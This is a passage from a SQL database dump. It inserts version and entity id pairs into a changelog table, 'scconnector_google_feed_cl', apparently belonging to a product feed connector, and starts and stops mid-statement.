(39754, 397),
(39755, 398),
(39756, 399),
(39757, 400),
(39758, 401),
(39759, 402),
(39760, 403),
(39761, 404),
(39762, 405),
(39763, 406),
(39764, 407),
(39765, 408),
(39766, 409),
(39767, 410),
(39768, 411),
(39769, 412),
(39770, 413),
(39771, 414),
(39772, 415),
(39773, 416),
(39774, 417),
(39775, 418),
(39776, 419),
(39777, 420),
(39778, 421),
(39779, 422),
(39780, 423),
(39781, 424),
(39782, 425),
(39783, 426),
(39784, 427),
(39785, 428),
(39786, 429),
(39787, 430),
(39788, 431),
(39789, 432),
(39790, 433),
(39791, 434),
(39792, 435),
(39793, 436),
(39794, 437),
(39795, 438),
(39796, 439),
(39797, 440),
(39798, 441),
(39799, 442),
(39800, 443),
(39801, 444),
(39802, 445),
(39803, 446),
(39804, 447),
(39805, 448),
(39806, 449),
(39807, 450),
(39808, 451),
(39809, 452),
(39810, 453),
(39811, 454),
(39812, 455),
(39813, 456),
(39814, 457),
(39815, 458),
(39816, 459),
(39817, 460),
(39818, 461),
(39819, 462),
(39820, 463),
(39821, 464),
(39822, 465),
(39823, 466),
(39824, 467),
(39825, 468),
(39826, 469),
(39827, 470),
(39828, 471),
(39829, 472),
(39830, 473),
(39831, 474),
(39832, 475),
(39833, 476),
(39834, 477),
(39835, 478),
(39836, 479),
(39837, 480),
(39838, 481),
(39839, 482),
(39840, 483),
(39841, 484),
(39842, 485),
(39843, 486),
(39844, 487),
(39845, 488),
(39846, 489),
(39847, 490),
(39848, 491),
(39849, 492),
(39850, 493),
(39851, 494),
(39852, 495),
(39853, 496),
(39854, 497),
(39855, 498),
(39856, 499),
(39857, 500),
(39858, 501),
(39859, 502),
(39860, 503),
(39861, 504),
(39862, 505),
(39863, 506),
(39864, 507),
(39865, 508),
(39866, 509),
(39867, 510),
(39868, 511),
(39869, 512),
(39870, 513),
(39871, 514),
(39872, 515),
(39873, 516),
(39874, 517),
(39875, 518),
(39876, 519),
(39877, 520),
(39878, 521),
(39879, 522),
(39880, 523),
(39881, 524),
(39882, 525),
(39883, 526),
(39884, 527),
(39885, 528),
(39886, 529),
(39887, 530),
(39888, 531),
(39889, 532),
(39890, 533),
(39891, 534),
(39892, 535),
(39893, 536),
(39894, 537),
(39895, 538),
(39896, 539),
(39897, 540),
(39898, 541),
(39899, 542),
(39900, 543),
(39901, 544),
(39902, 545),
(39903, 546),
(39904, 547),
(39905, 548),
(39906, 549),
(39907, 550),
(39908, 551),
(39909, 552),
(39910, 553),
(39911, 554),
(39912, 555),
(39913, 556),
(39914, 557),
(39915, 558),
(39916, 559),
(39917, 560),
(39918, 561),
(39919, 562),
(39920, 563),
(39921, 564),
(39922, 565),
(39923, 566),
(39924, 567),
(39925, 568),
(39926, 569),
(39927, 570),
(39928, 571),
(39929, 572),
(39930, 573),
(39931, 574),
(39932, 575),
(39933, 576),
(39934, 577),
(39935, 578),
(39936, 579),
(39937, 580),
(39938, 581),
(39939, 582),
(39940, 583),
(39941, 584),
(39942, 585),
(39943, 586),
(39944, 587),
(39945, 588),
(39946, 589),
(39947, 590),
(39948, 591),
(39949, 592),
(39950, 593),
(39951, 594),
(39952, 595),
(39953, 596),
(39954, 597),
(39955, 598),
(39956, 599),
(39957, 600),
(39958, 601),
(39959, 602),
(39960, 603),
(39961, 604),
(39962, 605),
(39963, 606),
(39964, 607),
(39965, 608),
(39966, 609),
(39967, 610),
(39968, 611),
(39969, 612),
(39970, 613),
(39971, 614),
(39972, 615),
(39973, 616),
(39974, 617),
(39975, 618),
(39976, 619),
(39977, 620),
(39978, 621),
(39979, 622),
(39980, 623),
(39981, 624),
(39982, 625),
(39983, 626),
(39984, 627),
(39985, 628),
(39986, 629),
(39987, 630),
(39988, 631),
(39989, 632),
(39990, 633),
(39991, 634),
(39992, 635),
(39993, 636),
(39994, 637),
(39995, 638),
(39996, 639),
(39997, 640),
(39998, 641),
(39999, 642),
(40000, 643),
(40001, 644),
(40002, 645),
(40003, 646),
(40004, 647),
(40005, 648),
(40006, 649),
(40007, 650),
(40008, 651),
(40009, 652),
(40010, 653),
(40011, 654),
(40012, 655),
(40013, 656),
(40014, 657),
(40015, 658),
(40016, 659),
(40017, 660),
(40018, 661),
(40019, 662),
(40020, 663),
(40021, 664),
(40022, 665),
(40023, 666),
(40024, 667),
(40025, 668),
(40026, 669),
(40027, 670),
(40028, 671),
(40029, 672),
(40030, 673),
(40031, 674),
(40032, 675),
(40033, 676),
(40034, 677),
(40035, 678),
(40036, 679),
(40037, 680),
(40038, 681),
(40039, 682),
(40040, 683),
(40041, 684),
(40042, 685),
(40043, 686),
(40044, 687),
(40045, 688),
(40046, 689),
(40047, 690),
(40048, 691),
(40049, 692),
(40050, 693),
(40051, 694),
(40052, 695),
(40053, 696),
(40054, 697),
(40055, 698),
(40056, 699),
(40057, 700),
(40058, 701),
(40059, 702),
(40060, 703),
(40061, 704),
(40062, 705),
(40063, 706),
(40064, 707),
(40065, 708),
(40066, 709),
(40067, 710),
(40068, 711),
(40069, 712),
(40070, 713),
(40071, 714),
(40072, 715),
(40073, 716),
(40074, 717),
(40075, 718),
(40076, 719),
(40077, 720),
(40078, 721),
(40079, 722),
(40080, 723),
(40081, 724),
(40082, 725),
(40083, 726),
(40084, 727),
(40085, 728),
(40086, 729),
(40087, 730),
(40088, 731),
(40089, 732),
(40090, 733),
(40091, 734),
(40092, 735),
(40093, 736),
(40094, 737),
(40095, 738),
(40096, 739),
(40097, 740),
(40098, 741),
(40099, 742),
(40100, 743),
(40101, 744),
(40102, 745),
(40103, 746),
(40104, 747),
(40105, 748),
(40106, 749),
(40107, 750),
(40108, 751),
(40109, 752),
(40110, 753),
(40111, 754),
(40112, 755),
(40113, 756),
(40114, 757),
(40115, 758),
(40116, 759),
(40117, 760),
(40118, 761),
(40119, 762),
(40120, 763),
(40121, 764),
(40122, 765),
(40123, 766),
(40124, 767),
(40125, 768),
(40126, 769),
(40127, 770),
(40128, 771),
(40129, 772),
(40130, 773),
(40131, 774),
(40132, 775),
(40133, 776),
(40134, 777),
(40135, 778),
(40136, 779),
(40137, 780),
(40138, 781),
(40139, 782),
(40140, 783),
(40141, 784),
(40142, 785),
(40143, 786),
(40144, 787),
(40145, 788),
(40146, 789),
(40147, 790),
(40148, 791),
(40149, 792),
(40150, 793),
(40151, 794),
(40152, 795),
(40153, 796),
(40154, 797),
(40155, 798),
(40156, 799),
(40157, 800),
(40158, 801),
(40159, 802),
(40160, 803),
(40161, 804),
(40162, 805),
(40163, 806),
(40164, 807),
(40165, 808),
(40166, 809),
(40167, 810),
(40168, 811),
(40169, 812),
(40170, 813),
(40171, 814),
(40172, 815),
(40173, 816),
(40174, 817),
(40175, 818),
(40176, 819),
(40177, 820),
(40178, 821),
(40179, 822),
(40180, 823),
(40181, 824),
(40182, 825),
(40183, 826),
(40184, 827),
(40185, 828),
(40186, 829),
(40187, 830),
(40188, 831),
(40189, 832),
(40190, 833),
(40191, 834),
(40192, 835),
(40193, 836),
(40194, 837),
(40195, 838),
(40196, 839),
(40197, 840),
(40198, 841),
(40199, 842),
(40200, 843),
(40201, 844),
(40202, 845),
(40203, 846),
(40204, 847),
(40205, 848),
(40206, 849),
(40207, 850),
(40208, 851),
(40209, 852),
(40210, 853),
(40211, 854),
(40212, 855),
(40213, 856),
(40214, 857),
(40215, 858),
(40216, 859),
(40217, 860),
(40218, 861),
(40219, 862),
(40220, 863),
(40221, 864),
(40222, 865),
(40223, 866),
(40224, 867),
(40225, 868),
(40226, 869),
(40227, 870),
(40228, 871),
(40229, 872),
(40230, 873),
(40231, 874),
(40232, 875),
(40233, 876),
(40234, 877),
(40235, 878),
(40236, 879),
(40237, 880),
(40238, 881),
(40239, 882),
(40240, 883),
(40241, 884),
(40242, 885),
(40243, 886),
(40244, 887),
(40245, 888),
(40246, 889),
(40247, 890),
(40248, 891),
(40249, 892),
(40250, 893),
(40251, 894),
(40252, 895),
(40253, 896),
(40254, 897),
(40255, 898),
(40256, 899),
(40257, 900),
(40258, 901),
(40259, 902),
(40260, 903),
(40261, 904),
(40262, 905),
(40263, 906),
(40264, 907),
(40265, 908),
(40266, 909),
(40267, 910),
(40268, 911),
(40269, 912),
(40270, 913),
(40271, 914),
(40272, 915),
(40273, 916),
(40274, 917),
(40275, 918),
(40276, 919),
(40277, 920),
(40278, 921),
(40279, 922),
(40280, 923),
(40281, 924),
(40282, 925),
(40283, 926),
(40284, 927),
(40285, 928),
(40286, 929),
(40287, 930),
(40288, 931),
(40289, 932),
(40290, 933),
(40291, 934),
(40292, 935),
(40293, 936),
(40294, 937),
(40295, 938),
(40296, 939),
(40297, 940),
(40298, 941),
(40299, 942),
(40300, 943),
(40301, 944),
(40302, 945),
(40303, 946),
(40304, 947),
(40305, 948),
(40306, 949),
(40307, 950),
(40308, 951),
(40309, 952),
(40310, 953),
(40311, 954),
(40312, 955),
(40313, 956),
(40314, 957),
(40315, 958),
(40316, 959),
(40317, 960),
(40318, 961),
(40319, 962),
(40320, 963),
(40321, 964),
(40322, 965),
(40323, 966),
(40324, 967),
(40325, 968),
(40326, 969),
(40327, 970),
(40328, 971),
(40329, 972),
(40330, 973),
(40331, 974),
(40332, 975),
(40333, 976),
(40334, 977),
(40335, 978),
(40336, 979),
(40337, 980),
(40338, 981),
(40339, 982),
(40340, 983),
(40341, 984),
(40342, 985),
(40343, 986),
(40344, 987),
(40345, 988),
(40346, 989),
(40347, 990),
(40348, 991),
(40349, 992),
(40350, 993),
(40351, 994),
(40352, 995),
(40353, 996),
(40354, 997),
(40355, 998),
(40356, 999),
(40357, 1000),
(40358, 1001),
(40359, 1002),
(40360, 1003),
(40361, 1004),
(40362, 1005),
(40363, 1006),
(40364, 1007),
(40365, 1008),
(40366, 1009),
(40367, 1010),
(40368, 1011),
(40369, 1012),
(40370, 1013),
(40371, 1014),
(40372, 1015),
(40373, 1016),
(40374, 1017),
(40375, 1018),
(40376, 1019),
(40377, 1020),
(40378, 1021),
(40379, 1022),
(40380, 1023),
(40381, 1024),
(40382, 1025),
(40383, 1026),
(40384, 1027),
(40385, 1028),
(40386, 1029),
(40387, 1030),
(40388, 1031),
(40389, 1032),
(40390, 1033),
(40391, 1034),
(40392, 1035),
(40393, 1036),
(40394, 1037),
(40395, 1038),
(40396, 1039),
(40397, 1040),
(40398, 1041),
(40399, 1042),
(40400, 1043),
(40401, 1044),
(40402, 1045),
(40403, 1046),
(40404, 1047),
(40405, 1048),
(40406, 1049),
(40407, 1050),
(40408, 1051),
(40409, 1052),
(40410, 1053),
(40411, 1054),
(40412, 1055),
(40413, 1056),
(40414, 1057),
(40415, 1058),
(40416, 1059),
(40417, 1060),
(40418, 1061),
(40419, 1062),
(40420, 1063),
(40421, 1064),
(40422, 1065),
(40423, 1066),
(40424, 1067),
(40425, 1068),
(40426, 1069),
(40427, 1070),
(40428, 1071),
(40429, 1072),
(40430, 1073),
(40431, 1074),
(40432, 1075),
(40433, 1076),
(40434, 1077),
(40435, 1078),
(40436, 1079),
(40437, 1080),
(40438, 1081),
(40439, 1082),
(40440, 1083),
(40441, 1084),
(40442, 1085),
(40443, 1086),
(40444, 1087),
(40445, 1088),
(40446, 1089),
(40447, 1090),
(40448, 1091),
(40449, 1092),
(40450, 1093),
(40451, 1094),
(40452, 1095),
(40453, 1096),
(40454, 1097),
(40455, 1098),
(40456, 1099),
(40457, 1100),
(40458, 1101),
(40459, 1102),
(40460, 1103),
(40461, 1104),
(40462, 1105),
(40463, 1106),
(40464, 1107),
(40465, 1108),
(40466, 1109),
(40467, 1110),
(40468, 1111),
(40469, 1112),
(40470, 1113),
(40471, 1114),
(40472, 1115),
(40473, 1116),
(40474, 1117),
(40475, 1118),
(40476, 1119),
(40477, 1120),
(40478, 1121),
(40479, 1122),
(40480, 1123),
(40481, 1124),
(40482, 1125),
(40483, 1126),
(40484, 1127),
(40485, 1128),
(40486, 1129),
(40487, 1130),
(40488, 1131),
(40489, 1132),
(40490, 1133),
(40491, 1134),
(40492, 1135),
(40493, 1136),
(40494, 1137),
(40495, 1138),
(40496, 1139),
(40497, 1140),
(40498, 1141),
(40499, 1142),
(40500, 1143),
(40501, 1144),
(40502, 1145),
(40503, 1146),
(40504, 1147),
(40505, 1148),
(40506, 1149),
(40507, 1150),
(40508, 1151),
(40509, 1152),
(40510, 1153),
(40511, 1154),
(40512, 1155),
(40513, 1156),
(40514, 1157),
(40515, 1158),
(40516, 1159),
(40517, 1160),
(40518, 1161),
(40519, 1162),
(40520, 1163),
(40521, 1164),
(40522, 1165),
(40523, 1166),
(40524, 1167),
(40525, 1168),
(40526, 1169),
(40527, 1170),
(40528, 1171),
(40529, 1172),
(40530, 1173),
(40531, 1174),
(40532, 1175),
(40533, 1176),
(40534, 1177),
(40535, 1178),
(40536, 1179),
(40537, 1180),
(40538, 1181),
(40539, 1182),
(40540, 1183),
(40541, 1184),
(40542, 1185),
(40543, 1186),
(40544, 1187),
(40545, 1188),
(40546, 1189),
(40547, 1190),
(40548, 1191),
(40549, 1192),
(40550, 1193),
(40551, 1194),
(40552, 1195),
(40553, 1196),
(40554, 1197),
(40555, 1198),
(40556, 1199),
(40557, 1200),
(40558, 1201),
(40559, 1202),
(40560, 1203),
(40561, 1204),
(40562, 1205),
(40563, 1206),
(40564, 1207),
(40565, 1208),
(40566, 1209),
(40567, 1210),
(40568, 1211),
(40569, 1212),
(40570, 1213),
(40571, 1214),
(40572, 1215),
(40573, 1216),
(40574, 1217),
(40575, 1218),
(40576, 1219),
(40577, 1220),
(40578, 1221),
(40579, 1222),
(40580, 1223),
(40581, 1224),
(40582, 1225),
(40583, 1226),
(40584, 1227),
(40585, 1228),
(40586, 1229),
(40587, 1230),
(40588, 1231),
(40589, 1232),
(40590, 1233),
(40591, 1234),
(40592, 1235),
(40593, 1236),
(40594, 1237),
(40595, 1238),
(40596, 1239),
(40597, 1240),
(40598, 1241),
(40599, 1242),
(40600, 1243),
(40601, 1244),
(40602, 1245),
(40603, 1246),
(40604, 1247),
(40605, 1248),
(40606, 1249),
(40607, 1250),
(40608, 1251),
(40609, 1252),
(40610, 1253),
(40611, 1254),
(40612, 1255),
(40613, 1256),
(40614, 1257),
(40615, 1258),
(40616, 1259),
(40617, 1260),
(40618, 1261),
(40619, 1262),
(40620, 1263),
(40621, 1264),
(40622, 1265),
(40623, 1266),
(40624, 1267),
(40625, 1268),
(40626, 1269),
(40627, 1270),
(40628, 1271),
(40629, 1272),
(40630, 1273),
(40631, 1274),
(40632, 1275),
(40633, 1276),
(40634, 1277),
(40635, 1278),
(40636, 1279),
(40637, 1280),
(40638, 1281),
(40639, 1282),
(40640, 1283),
(40641, 1284),
(40642, 1285),
(40643, 1286),
(40644, 1287),
(40645, 1288),
(40646, 1289),
(40647, 1290),
(40648, 1291),
(40649, 1292),
(40650, 1293),
(40651, 1294),
(40652, 1295),
(40653, 1296),
(40654, 1297),
(40655, 1298),
(40656, 1299),
(40657, 1300),
(40658, 1301),
(40659, 1302),
(40660, 1303),
(40661, 1304),
(40662, 1305),
(40663, 1306),
(40664, 1307),
(40665, 1308),
(40666, 1309),
(40667, 1310),
(40668, 1311),
(40669, 1312),
(40670, 1313),
(40671, 1314),
(40672, 1315),
(40673, 1316),
(40674, 1317),
(40675, 1318),
(40676, 1319),
(40677, 1320),
(40678, 1321),
(40679, 1322),
(40680, 1323),
(40681, 1324),
(40682, 1325),
(40683, 1326),
(40684, 1327),
(40685, 1328),
(40686, 1329),
(40687, 1330),
(40688, 1331),
(40689, 1332),
(40690, 1333),
(40691, 1334),
(40692, 1335),
(40693, 1336),
(40694, 1337),
(40695, 1338),
(40696, 1339),
(40697, 1340),
(40698, 1341),
(40699, 1342),
(40700, 1343),
(40701, 1344),
(40702, 1345),
(40703, 1346),
(40704, 1347),
(40705, 1348),
(40706, 1349),
(40707, 1350),
(40708, 1351),
(40709, 1352),
(40710, 1353),
(40711, 1354),
(40712, 1355),
(40713, 1356),
(40714, 1357),
(40715, 1358),
(40716, 1359),
(40717, 1360),
(40718, 1361),
(40719, 1362),
(40720, 1363),
(40721, 1364),
(40722, 1365),
(40723, 1366),
(40724, 1367),
(40725, 1368),
(40726, 1369),
(40727, 1370),
(40728, 1371),
(40729, 1372),
(40730, 1373),
(40731, 1374),
(40732, 1375),
(40733, 1376),
(40734, 1377),
(40735, 1378),
(40736, 1379),
(40737, 1380),
(40738, 1381),
(40739, 1382),
(40740, 1383),
(40741, 1384),
(40742, 1385),
(40743, 1386),
(40744, 1387),
(40745, 1388),
(40746, 1389),
(40747, 1390),
(40748, 1391),
(40749, 1392),
(40750, 1393),
(40751, 1394),
(40752, 1395),
(40753, 1396),
(40754, 1397),
(40755, 1398),
(40756, 1399),
(40757, 1400),
(40758, 1401),
(40759, 1402),
(40760, 1403),
(40761, 1404),
(40762, 1405),
(40763, 1406),
(40764, 1407),
(40765, 1408),
(40766, 1409),
(40767, 1410),
(40768, 1411),
(40769, 1412),
(40770, 1413),
(40771, 1414),
(40772, 1415),
(40773, 1416),
(40774, 1417),
(40775, 1418),
(40776, 1419),
(40777, 1420),
(40778, 1421),
(40779, 1422),
(40780, 1423),
(40781, 1424),
(40782, 1425),
(40783, 1426),
(40784, 1427),
(40785, 1428),
(40786, 1429),
(40787, 1430),
(40788, 1431),
(40789, 1432),
(40790, 1433),
(40791, 1434),
(40792, 1435),
(40793, 1436),
(40794, 1437),
(40795, 1438),
(40796, 1439),
(40797, 1440),
(40798, 1441),
(40799, 1442),
(40800, 1443),
(40801, 1444),
(40802, 1445),
(40803, 1446),
(40804, 1447),
(40805, 1448),
(40806, 1449),
(40807, 1450),
(40808, 1451),
(40809, 1452),
(40810, 1453),
(40811, 1454),
(40812, 1455),
(40813, 1456),
(40814, 1457),
(40815, 1458),
(40816, 1459),
(40817, 1460),
(40818, 1461),
(40819, 1462),
(40820, 1463),
(40821, 1464),
(40822, 1465),
(40823, 1466),
(40824, 1467),
(40825, 1468),
(40826, 1469),
(40827, 1470),
(40828, 1471),
(40829, 1472),
(40830, 1473),
(40831, 1474),
(40832, 1475),
(40833, 1476),
(40834, 1477),
(40835, 1478),
(40836, 1479),
(40837, 1480),
(40838, 1481),
(40839, 1482),
(40840, 1483),
(40841, 1484),
(40842, 1485),
(40843, 1486),
(40844, 1487),
(40845, 1488),
(40846, 1489),
(40847, 1490),
(40848, 1491),
(40849, 1492),
(40850, 1493),
(40851, 1494),
(40852, 1495),
(40853, 1496),
(40854, 1497),
(40855, 1498),
(40856, 1499),
(40857, 1500),
(40858, 1501),
(40859, 1502),
(40860, 1503),
(40861, 1504),
(40862, 1505),
(40863, 1506),
(40864, 1507),
(40865, 1508),
(40866, 1509),
(40867, 1510),
(40868, 1511),
(40869, 1512),
(40870, 1513),
(40871, 1514),
(40872, 1515),
(40873, 1516),
(40874, 1517),
(40875, 1518),
(40876, 1519),
(40877, 1520),
(40878, 1521),
(40879, 1522),
(40880, 1523),
(40881, 1524),
(40882, 1525),
(40883, 1526),
(40884, 1527),
(40885, 1528),
(40886, 1529),
(40887, 1530),
(40888, 1531),
(40889, 1532),
(40890, 1533),
(40891, 1534),
(40892, 1535),
(40893, 1536),
(40894, 1537),
(40895, 1538),
(40896, 1539),
(40897, 1540),
(40898, 1541),
(40899, 1542),
(40900, 1543),
(40901, 1544),
(40902, 1545),
(40903, 1546),
(40904, 1547),
(40905, 1548),
(40906, 1549),
(40907, 1550),
(40908, 1551),
(40909, 1552),
(40910, 1553),
(40911, 1554),
(40912, 1555),
(40913, 1556),
(40914, 1557),
(40915, 1558),
(40916, 1559),
(40917, 1560),
(40918, 1561),
(40919, 1562),
(40920, 1563),
(40921, 1564),
(40922, 1565),
(40923, 1566),
(40924, 1567),
(40925, 1568),
(40926, 1569),
(40927, 1570),
(40928, 1571),
(40929, 1572),
(40930, 1573),
(40931, 1574),
(40932, 1575),
(40933, 1576),
(40934, 1577),
(40935, 1578),
(40936, 1579),
(40937, 1580),
(40938, 1581),
(40939, 1582),
(40940, 1583),
(40941, 1584),
(40942, 1585),
(40943, 1586),
(40944, 1587),
(40945, 1588),
(40946, 1589),
(40947, 1590),
(40948, 1591),
(40949, 1592),
(40950, 1593),
(40951, 1594),
(40952, 1595),
(40953, 1596),
(40954, 1597),
(40955, 1598),
(40956, 1599),
(40957, 1600),
(40958, 1601),
(40959, 1602),
(40960, 1603),
(40961, 1604),
(40962, 1605),
(40963, 1606),
(40964, 1607),
(40965, 1608),
(40966, 1609),
(40967, 1610),
(40968, 1611),
(40969, 1612),
(40970, 1613),
(40971, 1614),
(40972, 1615),
(40973, 1616),
(40974, 1617),
(40975, 1618),
(40976, 1619),
(40977, 1620),
(40978, 1621),
(40979, 1622),
(40980, 1623),
(40981, 1624),
(40982, 1625),
(40983, 1626),
(40984, 1627),
(40985, 1628),
(40986, 1629),
(40987, 1630),
(40988, 1631),
(40989, 1632),
(40990, 1633),
(40991, 1634),
(40992, 1635),
(40993, 1636),
(40994, 1637),
(40995, 1638),
(40996, 1639),
(40997, 1640),
(40998, 1641),
(40999, 1642),
(41000, 1643),
(41001, 1644),
(41002, 1645),
(41003, 1646),
(41004, 1647),
(41005, 1648),
(41006, 1649),
(41007, 1650),
(41008, 1651),
(41009, 1652),
(41010, 1653),
(41011, 1654),
(41012, 1655),
(41013, 1656),
(41014, 1657),
(41015, 1658),
(41016, 1659),
(41017, 1660),
(41018, 1661),
(41019, 1662),
(41020, 1663),
(41021, 1664),
(41022, 1665),
(41023, 1666),
(41024, 1667),
(41025, 1668),
(41026, 1669),
(41027, 1670),
(41028, 1671),
(41029, 1672),
(41030, 1673),
(41031, 1674),
(41032, 1675),
(41033, 1676),
(41034, 1677),
(41035, 1678),
(41036, 1679),
(41037, 1680),
(41038, 1681),
(41039, 1682),
(41040, 1683),
(41041, 1684),
(41042, 1685),
(41043, 1686),
(41044, 1687),
(41045, 1688),
(41046, 1689),
(41047, 1690),
(41048, 1691),
(41049, 1692),
(41050, 1693),
(41051, 1694),
(41052, 1695),
(41053, 1696);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(41054, 1697),
(41055, 1698),
(41056, 1699),
(41057, 1700),
(41058, 1701),
(41059, 1702),
(41060, 1703),
(41061, 1704),
(41062, 1705),
(41063, 1706),
(41064, 1707),
(41065, 1708),
(41066, 1709),
(41067, 1710),
(41068, 1711),
(41069, 1712),
(41070, 1713),
(41071, 1714),
(41072, 1715),
(41073, 1716),
(41074, 1717),
(41075, 1718),
(41076, 1719),
(41077, 1720),
(41078, 1721),
(41079, 1722),
(41080, 1723),
(41081, 1724),
(41082, 1725),
(41083, 1726),
(41084, 1727),
(41085, 1728),
(41086, 1729),
(41087, 1730),
(41088, 1731),
(41089, 1732),
(41090, 1733),
(41091, 1734),
(41092, 1735),
(41093, 1736),
(41094, 1737),
(41095, 1738),
(41096, 1739),
(41097, 1740),
(41098, 1741),
(41099, 1742),
(41100, 1743),
(41101, 1744),
(41102, 1745),
(41103, 1746),
(41104, 1747),
(41105, 1748),
(41106, 1749),
(41107, 1750),
(41108, 1751),
(41109, 1752),
(41110, 1753),
(41111, 1754),
(41112, 1755),
(41113, 1756),
(41114, 1757),
(41115, 1758),
(41116, 1759),
(41117, 1760),
(41118, 1761),
(41119, 1762),
(41120, 1763),
(41121, 1764),
(41122, 1765),
(41123, 1766),
(41124, 1767),
(41125, 1768),
(41126, 1769),
(41127, 1770),
(41128, 1771),
(41129, 1772),
(41130, 1773),
(41131, 1774),
(41132, 1775),
(41133, 1776),
(41134, 1777),
(41135, 1778),
(41136, 1779),
(41137, 1780),
(41138, 1781),
(41139, 1782),
(41140, 1783),
(41141, 1784),
(41142, 1785),
(41143, 1786),
(41144, 1787),
(41145, 1788),
(41146, 1789),
(41147, 1790),
(41148, 1791),
(41149, 1792),
(41150, 1793),
(41151, 1794),
(41152, 1795),
(41153, 1796),
(41154, 1797),
(41155, 1798),
(41156, 1799),
(41157, 1800),
(41158, 1801),
(41159, 1802),
(41160, 1803),
(41161, 1804),
(41162, 1805),
(41163, 1806),
(41164, 1807),
(41165, 1808),
(41166, 1809),
(41167, 1810),
(41168, 1811),
(41169, 1812),
(41170, 1813),
(41171, 1814),
(41172, 1815),
(41173, 1816),
(41174, 1817),
(41175, 1818),
(41176, 1819),
(41177, 1820),
(41178, 1821),
(41179, 1822),
(41180, 1823),
(41181, 1824),
(41182, 1825),
(41183, 1826),
(41184, 1827),
(41185, 1828),
(41186, 1829),
(41187, 1830),
(41188, 1831),
(41189, 1832),
(41190, 1833),
(41191, 1834),
(41192, 1835),
(41193, 1836),
(41194, 1837),
(41195, 1838),
(41196, 1839),
(41197, 1840),
(41198, 1841),
(41199, 1842),
(41200, 1843),
(41201, 1844),
(41202, 1845),
(41203, 1846),
(41204, 1847),
(41205, 1848),
(41206, 1849),
(41207, 1850),
(41208, 1851),
(41209, 1852),
(41210, 1853),
(41211, 1854),
(41212, 1855),
(41213, 1856),
(41214, 1857),
(41215, 1858),
(41216, 1859),
(41217, 1860),
(41218, 1861),
(41219, 1862),
(41220, 1863),
(41221, 1864),
(41222, 1865),
(41223, 1866),
(41224, 1867),
(41225, 1868),
(41226, 1869),
(41227, 1870),
(41228, 1871),
(41229, 1872),
(41230, 1873),
(41231, 1874),
(41232, 1875),
(41233, 1876),
(41234, 1877),
(41235, 1878),
(41236, 1879),
(41237, 1880),
(41238, 1881),
(41239, 1882),
(41240, 1883),
(41241, 1884),
(41242, 1885),
(41243, 1886),
(41244, 1887),
(41245, 1888),
(41246, 1889),
(41247, 1890),
(41248, 1891),
(41249, 1892),
(41250, 1893),
(41251, 1894),
(41252, 1895),
(41253, 1896),
(41254, 1897),
(41255, 1898),
(41256, 1899),
(41257, 1900),
(41258, 1901),
(41259, 1902),
(41260, 1903),
(41261, 1904),
(41262, 1905),
(41263, 1906),
(41264, 1907),
(41265, 1908),
(41266, 1909),
(41267, 1910),
(41268, 1911),
(41269, 1912),
(41270, 1913),
(41271, 1914),
(41272, 1915),
(41273, 1916),
(41274, 1917),
(41275, 1918),
(41276, 1919),
(41277, 1920),
(41278, 1921),
(41279, 1922),
(41280, 1923),
(41281, 1924),
(41282, 1925),
(41283, 1926),
(41284, 1927),
(41285, 1928),
(41286, 1929),
(41287, 1930),
(41288, 1931),
(41289, 1932),
(41290, 1933),
(41291, 1934),
(41292, 1935),
(41293, 1936),
(41294, 1937),
(41295, 1938),
(41296, 1939),
(41297, 1940),
(41298, 1941),
(41299, 1942),
(41300, 1943),
(41301, 1944),
(41302, 1945),
(41303, 1946),
(41304, 1947),
(41305, 1948),
(41306, 1949),
(41307, 1950),
(41308, 1951),
(41309, 1952),
(41310, 1953),
(41311, 1954),
(41312, 1955),
(41313, 1956),
(41314, 1957),
(41315, 1958),
(41316, 1959),
(41317, 1960),
(41318, 1961),
(41319, 1962),
(41320, 1963),
(41321, 1964),
(41322, 1965),
(41323, 1966),
(41324, 1967),
(41325, 1968),
(41326, 1969),
(41327, 1970),
(41328, 1971),
(41329, 1972),
(41330, 1973),
(41331, 1974),
(41332, 1975),
(41333, 1976),
(41334, 1977),
(41335, 1978),
(41336, 1979),
(41337, 1980),
(41338, 1981),
(41339, 1982),
(41340, 1983),
(41341, 1984),
(41342, 1985),
(41343, 1986),
(41344, 1987),
(41345, 1988),
(41346, 1989),
(41347, 1990),
(41348, 1991),
(41349, 1992),
(41350, 1993),
(41351, 1994),
(41352, 1995),
(41353, 1996),
(41354, 1997),
(41355, 1998),
(41356, 1999),
(41357, 2000),
(41358, 2001),
(41359, 2002),
(41360, 2003),
(41361, 2004),
(41362, 2005),
(41363, 2006),
(41364, 2007),
(41365, 2008),
(41366, 2009),
(41367, 2010),
(41368, 2011),
(41369, 2012),
(41370, 2013),
(41371, 2014),
(41372, 2015),
(41373, 2016),
(41374, 2017),
(41375, 2018),
(41376, 2019),
(41377, 2020),
(41378, 2021),
(41379, 2022),
(41380, 2023),
(41381, 2024),
(41382, 2025),
(41383, 2026),
(41384, 2027),
(41385, 2028),
(41386, 2029),
(41387, 2030),
(41388, 2031),
(41389, 2032),
(41390, 2033),
(41391, 2034),
(41392, 2035),
(41393, 2036),
(41394, 2037),
(41395, 2038),
(41396, 2039),
(41397, 2040),
(41398, 2041),
(41399, 2042),
(41400, 2043),
(41401, 2044),
(41402, 2045),
(41403, 2046),
(41404, 2047),
(41405, 2048),
(41406, 2049),
(41407, 2050),
(41408, 2051),
(41409, 2052),
(41410, 2053),
(41411, 1233),
(41412, 1233),
(41413, 1233),
(41414, 1233),
(41415, 1233),
(41416, 1233),
(41417, 1233),
(41418, 1249),
(41419, 1249),
(41420, 1249),
(41421, 1249),
(41422, 1249),
(41423, 1249),
(41424, 1249),
(41425, 1265),
(41426, 1265),
(41427, 1265),
(41428, 1265),
(41429, 1265),
(41430, 1265),
(41431, 1265),
(41432, 1281),
(41433, 1281),
(41434, 1281),
(41435, 1281),
(41436, 1281),
(41437, 1281),
(41438, 1281),
(41439, 1297),
(41440, 1297),
(41441, 1297),
(41442, 1297),
(41443, 1297),
(41444, 1297),
(41445, 1297),
(41446, 1393),
(41447, 1393),
(41448, 1393),
(41449, 1393),
(41450, 1393),
(41451, 1393),
(41452, 1393),
(41453, 1313),
(41454, 1313),
(41455, 1313),
(41456, 1313),
(41457, 1313),
(41458, 1313),
(41459, 1313),
(41460, 1329),
(41461, 1329),
(41462, 1329),
(41463, 1329),
(41464, 1329),
(41465, 1329),
(41466, 1329),
(41467, 1345),
(41468, 1345),
(41469, 1345),
(41470, 1345),
(41471, 1345),
(41472, 1345),
(41473, 1345),
(41474, 1361),
(41475, 1361),
(41476, 1361),
(41477, 1361),
(41478, 1361),
(41479, 1361),
(41480, 1361),
(41481, 1377),
(41482, 1377),
